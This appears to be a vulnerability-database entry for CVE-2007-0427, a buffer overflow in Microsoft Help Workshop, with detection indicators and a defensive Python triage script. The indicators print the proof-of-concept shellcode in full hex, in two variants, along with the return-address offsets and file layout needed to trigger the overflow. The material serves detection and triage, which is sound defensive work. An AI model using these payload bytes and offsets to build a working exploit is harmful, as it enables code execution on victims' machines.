CVE-2007-0427
published 2007-01-23


Priority: P3 (47)
CVSS 2.0: 9.3 critical, vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public PoC available
EPSS: 30.96% (98.0th percentile)

Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section.

Affected (1 range)

Vendor: microsoft
Product: html_help_workshop
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

  • filename: .cnt
  • filename: .HPJ
  • command (start of the crafted .HPJ: a comment line, then the [OPTIONS] header and the HLP= key): ;Microsoft Help Workshop PoC exploit by porkythepig [OPTIONS] HLP=
  • bytes (shellcode, variant 1): 66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 32 d2 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 32 d2 88 10 58 50 66 2d 11 05 48 40 8b d0 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
  • bytes (shellcode, variant 2; the same payload with the 0x00 bytes avoided: `xor dl,dl` becomes `mov dl,1`, and a short loop at the end rewrites the 0x01 terminator to 0x00 at runtime): 66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 b2 01 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 b2 01 88 10 58 50 66 2d 11 05 48 40 8b d0 80 38 01 74 03 40 eb f8 32 c9 88 08 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
  • bytes (5-byte near jump, `jmp rel32` with displacement -485, i.e. a jump back 485 bytes): e9 1b fe ff ff
  • Stack-based buffer overflow is triggered by a long HLP field value in the [OPTIONS] section of a .HPJ project file opened in Microsoft Help Workshop 4.03.0002
  • Exploit .cnt file payload begins with the ASCII string '0 Microsoft Help Workshop PoC exploit by porkythepig' followed immediately by shellcode; detect this pattern in .cnt files
  • Exploit .HPJ file payload begins with ';Microsoft Help Workshop PoC exploit by porkythepig' followed by [OPTIONS] and HLP= with embedded shellcode; detect oversized HLP= values in .HPJ files
  • The .cnt exploit buffer is exactly 619 bytes and the .HPJ exploit buffer is exactly 671 bytes. An exact-length match only catches this PoC verbatim; treat it as a low-confidence signal alongside the marker string and shellcode bytes.
  • In the .cnt exploit the saved return address is overwritten at offset 0x210 (528 bytes) into the buffer; any .cnt input of at least that length reaches the return address.
  • In the .HPJ exploit the saved return address is overwritten at offset 0x14e (334 bytes) into the buffer; any HLP= input of at least that length reaches the return address.
  • The exploit provides five OS-specific API pointer sets (osApiPtrs); the JMP ESP gadget addresses and API addresses vary per OS version. The shellcode above embeds absolute addresses directly (`mov eax, imm32` / `call eax`, e.g. b8 7a 6b 3f 79 ff d0), so both the return address and the payload are tied to a particular build. Detection based on hardcoded return addresses will only cover the specific OS variants targeted by this PoC.
  • The vulnerability is described as 'user-assisted': the victim must open a malicious .HPJ or .cnt file in Microsoft Help Workshop, so exploitation requires social engineering.
  • Microsoft Help Workshop 4.03.0002 is described as a standard component of MS Visual Studio v6.0 and 2003 (.NET); affected systems are those with these Visual Studio versions installed.
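A static triage script for the indicators above (an oversized HLP= value in the [OPTIONS] section of a .HPJ file, an overlong .cnt entry, and the PoC marker string, shellcode prefix and backward jump in either file type), written here as an added example; it is not part of the PoC and not Microsoft tooling. The sample .HPJ and .cnt contents are constructed, the 260-byte warning threshold and the treatment of one .cnt line as the overflowed buffer are assumptions, and the 'A'/'B' filler stands in for the real padding and return address.

```python
"""Static triage of Help Workshop project (.HPJ) and contents (.cnt) files for
CVE-2007-0427 indicators. Added example, not part of the original PoC."""
from dataclasses import dataclass

# Offsets, marker and byte patterns taken from the PoC analysis above.
HPJ_RET_OFFSET = 0x14E   # 334 bytes: return-address overwrite in the .HPJ case
CNT_RET_OFFSET = 0x210   # 528 bytes: return-address overwrite in the .cnt case
POC_MARKER = b"Microsoft Help Workshop PoC exploit by porkythepig"
SHELLCODE_PREFIX = bytes.fromhex("6683c4108bc46681ec102150662d1111")  # shared by both variants
JMP_BACK = bytes.fromhex("e91bfeffff")                                # jmp rel32, displacement -485
# Assumption (not from the page): a legitimate HLP= value is a short file name,
# so anything this long is worth a warning even before the overwrite offset.
HLP_WARN_LEN = 260


@dataclass
class Finding:
    path: str
    reasons: list


def hpj_hlp_values(data: bytes) -> list:
    """Return every HLP= value inside an [OPTIONS] section of an .HPJ file.
    The format is INI-like: [SECTION] headers, KEY=VALUE lines, ';' comments."""
    values, section = [], None
    for raw in data.splitlines():          # bytes.splitlines splits only on \r, \n, \r\n
        line = raw.strip()
        if not line or line.startswith(b";"):
            continue
        if line.startswith(b"[") and line.endswith(b"]"):
            section = line[1:-1].strip().upper()
            continue
        if section == b"OPTIONS":
            key, sep, val = line.partition(b"=")
            if sep and key.strip().upper() == b"HLP":
                values.append(val.strip())
    return values


def byte_indicators(data: bytes) -> list:
    """Indicators shared by both file types: the PoC's comment string and the
    raw payload bytes listed in the IOC section."""
    reasons = []
    if POC_MARKER in data:
        reasons.append("porkythepig PoC marker string")
    if SHELLCODE_PREFIX in data:
        reasons.append("known shellcode prefix")
    if JMP_BACK in data:
        reasons.append("e9 1b fe ff ff backward jump")
    return reasons


def scan_hpj(path: str, data: bytes) -> Finding:
    reasons = byte_indicators(data)
    for val in hpj_hlp_values(data):
        if len(val) >= HPJ_RET_OFFSET:
            reasons.append(f"HLP= value of {len(val)} bytes reaches return-address offset 0x{HPJ_RET_OFFSET:x}")
        elif len(val) >= HLP_WARN_LEN:
            reasons.append(f"HLP= value of {len(val)} bytes exceeds {HLP_WARN_LEN}")
    return Finding(path, reasons)


def scan_cnt(path: str, data: bytes) -> Finding:
    # Assumption: the overflowed .cnt buffer is a single line of the contents file.
    reasons = byte_indicators(data)
    longest = max((len(l) for l in data.splitlines()), default=0)
    if longest >= CNT_RET_OFFSET:
        reasons.append(f".cnt line of {longest} bytes reaches return-address offset 0x{CNT_RET_OFFSET:x}")
    return Finding(path, reasons)


def scan(path: str, data: bytes) -> Finding:
    """Dispatch on extension; anything else is out of scope for this CVE."""
    lower = path.lower()
    if lower.endswith(".hpj"):
        return scan_hpj(path, data)
    if lower.endswith(".cnt"):
        return scan_cnt(path, data)
    return Finding(path, [])


# Constructed samples (not real files from the PoC).
BENIGN_HPJ = b"[OPTIONS]\r\nHLP=sample.hlp\r\nTITLE=Sample Help\r\n[FILES]\r\nsample.rtf\r\n"
BENIGN_CNT = b":Base sample.hlp\r\n1 Contents=main\r\n2 Introduction=intro\r\n"


def crafted_hpj() -> bytes:
    """Mimics the PoC layout: comment marker, [OPTIONS], HLP= padded past the
    overwrite offset. 'A' is padding, 'BBBB' stands in for the return address,
    and only the first 16 shellcode bytes are included."""
    value = b"A" * HPJ_RET_OFFSET + b"BBBB" + b"\x90" * 8 + SHELLCODE_PREFIX
    return b";" + POC_MARKER + b"\r\n[OPTIONS]\r\nHLP=" + value + b"\r\n"


def crafted_cnt() -> bytes:
    """'0 <marker>' followed by filler long enough to reach the .cnt overwrite offset."""
    return b"0 " + POC_MARKER + b"\x90" * CNT_RET_OFFSET + b"\r\n"


if __name__ == "__main__":
    for name, data in (("ok.hpj", BENIGN_HPJ), ("ok.cnt", BENIGN_CNT),
                       ("poc.hpj", crafted_hpj()), ("poc.cnt", crafted_cnt())):
        f = scan(name, data)
        print(name, "FLAGGED" if f.reasons else "clean", f.reasons)
```

The length checks key off the overwrite offsets the page gives, so they catch re-padded variants that drop the marker string; the byte patterns catch this PoC's payload even if it is moved to a different offset. Neither check knows anything about the OS-specific return addresses, which is why the script reports reasons rather than a single verdict.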